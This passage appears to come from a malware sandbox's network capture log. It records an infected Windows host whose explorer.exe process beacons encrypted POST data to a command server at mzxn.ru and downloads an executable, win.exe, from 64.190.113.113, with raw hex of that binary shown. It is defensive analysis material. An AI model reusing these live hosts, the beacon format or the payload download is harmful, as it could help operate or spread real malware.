Jul 27, 2024 07:30:01.854172945 CEST	349	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 47 01 d8 ed Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vuGP,uEl+T(&vM/\|P;3K(}t+_=!9@:/oeK,,MBHhnq7^
Jul 27, 2024 07:30:03.398591042 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:03 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	51805	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:03.406335115 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gbvtererkqfobu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 261 Host: mzxn.ru
Jul 27, 2024 07:30:03.406358004 CEST	261	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 30 17 c6 8c Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vu0dTcz=!S"@xV6pJ;^'YR:T;JZd0E\#Uh9@EUhnkBBv+f2f
Jul 27, 2024 07:30:04.950879097 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	51806	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:04.965528965 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://icugirctwrbhpuq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: mzxn.ru
Jul 27, 2024 07:30:04.965559006 CEST	301	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 6c 25 e3 8e Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vul%J#Ey>08?4Ymb)IZ;z!?Q5CMRY0!h8]6@IT&/4iFr#kLJ,Bhy\}~L
Jul 27, 2024 07:30:06.486047029 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	51807	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:06.497216940 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qnovtwajiclq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 303 Host: mzxn.ru
Jul 27, 2024 07:30:06.497251987 CEST	303	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 2d 26 ac ea Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vu-&~CeYZhZ+@r{YS%qY/@"1-ad4xYA)un8F?L5rmST%H(VkV^G
Jul 27, 2024 07:30:08.032171011 CEST	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	51808	64.190.113.113	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:08.040503025 CEST	159	OUT	GET /win.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 64.190.113.113
Jul 27, 2024 07:30:08.617542982 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:30:08 GMT Server: Apache Last-Modified: Mon, 22 Jul 2024 19:29:34 GMT ETag: "f1600-61ddb109e6b16" Accept-Ranges: bytes Content-Length: 988672 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdlZA"\Z@p`xD`X.text `.rdataPL@@.data0 @.CRTP@@.relocX`@B
Jul 27, 2024 07:30:08.617571115 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 57 Data Ascii: AWAVAUATVWUSHH-Xl$(D5QDt$0D$(D$48AcqAqw3A]Uqw3fffff.=#Y=8=\|(=/2t=uL$&D$'0GwAE
Jul 27, 2024 07:30:08.617588043 CEST	1236	IN	Data Raw: d2 0f 44 f7 45 84 c9 0f 44 f7 66 90 81 fe 89 ee d9 12 7f 78 81 fe 3a c2 31 ce 0f 8f fc 00 00 00 81 fe 05 3b ec ae 0f 8f 0c 02 00 00 81 fe 5d 9b 1e 9c 0f 8f d5 03 00 00 81 fe 3b d2 d3 8c 0f 8e 63 07 00 00 81 fe f8 a0 fd 96 0f 8e 29 0c 00 00 81 fe Data Ascii: DEDfx:1;];c)EC5uD$D$DL$hf\|K4@0\|:<6.:8:899: L$X
Jul 27, 2024 07:30:08.617603064 CEST	1236	IN	Data Raw: fb ff ff 81 fe 94 f4 98 0a 0f 8e d5 05 00 00 81 fe 06 5d 3b 0f 0f 8e c8 0a 00 00 81 fe 07 5d 3b 0f 0f 84 3d 13 00 00 81 fe 64 e5 f0 10 0f 84 4b 13 00 00 81 fe e1 5c 3f 11 0f 85 f9 fa ff ff 44 8b 8c 24 f8 00 00 00 44 0f af 8c 24 d0 01 00 00 45 89 Data Ascii: ];];=dK\?D$D$EAE!D$999Tv){*{"}V2~D$D$ D$D$$D$D$(DYAyA=I
Jul 27, 2024 07:30:08.617619038 CEST	1236	IN	Data Raw: f6 ff ff 81 fe 49 fa 3f 58 0f 8f bd 08 00 00 81 fe e3 62 e0 55 0f 84 5c 11 00 00 81 fe cd ae cd 56 0f 85 3d f6 ff ff 4c 8b 8c 24 50 02 00 00 45 0f b6 09 44 8b 74 24 2c 41 ff c6 44 8b 54 24 2c 47 88 0c 10 44 8b 8c 24 64 01 00 00 44 89 8c 24 c4 00 Data Ascii: I?XbU\V=L$PEDt$,ADT$,GD$dD$PG$DL$0D$/^^Y\|$F~_u\(DL$<D$D$ D$?}:E@?~DL$HAD$X
Jul 27, 2024 07:30:08.617634058 CEST	1236	IN	Data Raw: 44 89 8c 24 cc 00 00 00 e9 83 f1 ff ff 81 fe 88 fe 14 5e 0f 84 b6 0f 00 00 81 fe 10 59 3f 5f 0f 85 6b f1 ff ff 44 8b 0d 64 fe 0e 00 44 8b 15 61 fe 0e 00 44 89 94 24 90 01 00 00 45 8d 51 01 45 0f af d1 45 89 d1 41 83 f1 fe 45 21 d1 44 89 8c 24 94 Data Ascii: D$^Y?_kDdDaD$EQEEAE!D$1TOZD$DL$8D$DL$<DL$8AAh%AtDL$DL$ DL$8D$DL$<D$:CeE
Jul 27, 2024 07:30:08.617650986 CEST	1236	IN	Data Raw: c1 44 89 8c 24 d8 01 00 00 44 8b 4c 24 68 46 0f b6 0c 09 44 88 4c 24 24 be 94 64 3b 6f e9 9a ec ff ff 81 fe a4 16 e3 71 0f 84 95 0e 00 00 81 fe 1c 4e 37 72 0f 85 82 ec ff ff be 5a 4e fa 05 e9 78 ec ff ff 81 fe 19 68 60 cc 0f 84 ad 0e 00 00 81 fe Data Ascii: D$DL$hFDL$$d;oqN7rZNxh`}`Vh%7%>4PDDD$EQEAD$VS{TD
Jul 27, 2024 07:30:08.617835045 CEST	1236	IN	Data Raw: ff c1 44 89 8c 24 e4 01 00 00 be 1f c5 74 ff e9 d4 e7 ff ff 44 8b 4c 24 60 45 01 c9 44 89 8c 24 a8 01 00 00 be 14 af 62 29 e9 ba e7 ff ff 44 8b 4c 24 4c 49 01 c9 4c 89 8c 24 50 02 00 00 be cd ae cd 56 e9 a0 e7 ff ff be 30 c4 7f a1 e9 96 e7 ff ff Data Ascii: D$tDL$`ED$b)DL$LIL$PV0DL$DT$DD0ZNZNfN7r\DAAD$DL\|A1'AAL\|E1D@0t+AL$D$D$DL$\|D$
Jul 27, 2024 07:30:08.617851019 CEST	1236	IN	Data Raw: e1 01 44 88 4c 24 20 be ad 22 aa 0e e9 03 e3 ff ff 44 8b 4c 24 34 44 89 8c 24 a8 00 00 00 be 0a 46 7e 5f 44 8b 8c 24 8c 01 00 00 44 89 8c 24 98 00 00 00 e9 dc e2 ff ff be fa 14 3a 43 e9 d2 e2 ff ff 44 8b 94 24 14 02 00 00 45 85 d2 40 0f 94 c6 44 Data Ascii: DL$ "DL$4D$F~_D$D$:CD$E@D$A@@0{{uAMEED$DL$`D$DL$dDL$`AAD$DL$`AAqNYAC];9$4D$D$0A
Jul 27, 2024 07:30:08.617866993 CEST	1236	IN	Data Raw: ff 44 8b 4c 24 04 45 01 c9 44 89 8c 24 78 01 00 00 be 1e 54 4f a7 e9 25 de ff ff 44 0f b6 4c 24 1a 44 0f b6 54 24 1b 44 89 ce 44 30 d6 be e6 06 77 6f bf e6 06 77 6f 0f 85 f5 dd ff ff bf 70 fb e4 68 e9 eb dd ff ff 44 8b 0d f2 ea 0e 00 44 8b 15 ef Data Ascii: DL$ED$xTO%DL$DT$DD0wowophDDD$EQEEAE!D$-WDL$,L$8EDL$4DT$41A9@3A9AAD$U&OuD$DL$PD$D$L$ E
Jul 27, 2024 07:30:08.622677088 CEST	1236	IN	Data Raw: f7 e9 36 fd ff ff 3d 94 d2 e7 1c 0f 84 70 01 00 00 3d ac f6 9c 2b 0f 85 20 fd ff ff b8 10 c6 f2 de e9 16 fd ff ff 83 7d c8 00 0f 94 c0 0a 45 e5 0f b6 c0 83 e0 01 f7 d8 89 45 c4 b8 8e f5 c1 05 e9 f7 fc ff ff 48 8b 45 a8 c6 00 13 48 8b 45 e8 c6 40 Data Ascii: 6=p=+ }EEHEHE@HE@HE@HE@HE@HEHHE`H)HHE H)HHE %vHMH H EEHEHERSbF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	51809	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:09.573019028 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qrsqtwgtiasbuo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 309 Host: mzxn.ru
Jul 27, 2024 07:30:09.573050976 CEST	309	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 01 6b 2c 90 f4 76 0b 75 5e 1d de 83 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA ,[k,vu^R1Om}m\X<<9fYzja4>BHJADM@Qq\|hB@Y"zCBBo5n%n[z]a88$
Jul 27, 2024 07:30:11.104420900 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	51810	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:11.112302065 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qgdbhmlcsptqb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: mzxn.ru
Jul 27, 2024 07:30:11.112314939 CEST	335	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 7b 2c a4 e8 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vu{,Ol{2Teee7PM!+bt\|A-J*W[5.y_P@bfCID"vkU3AT1sr/R
Jul 27, 2024 07:30:12.626574039 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	51811	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:12.634613991 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ohroqjqgvdh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 169 Host: mzxn.ru
Jul 27, 2024 07:30:12.634649038 CEST	169	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 37 4e ec be Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA -[k,vu7NLaP\-^<yHaL5S;EZQv}Y8=jbrI
Jul 27, 2024 07:30:14.159498930 CEST	206	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	51816	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:30:24.502756119 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://swfkahecbiykwi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 336 Host: mzxn.ru
Jul 27, 2024 07:30:24.502768993 CEST	336	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 07 6b 2c 90 f4 76 0b 75 5f 57 da b6 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA ,[k,vu_W}XSjlLwI"hy;\|"_$B@zU^,Y#g#&/VC6AHgeo~L71c*G<U3(
Jul 27, 2024 07:30:26.026835918 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:30:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	51818	125.7.253.10	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
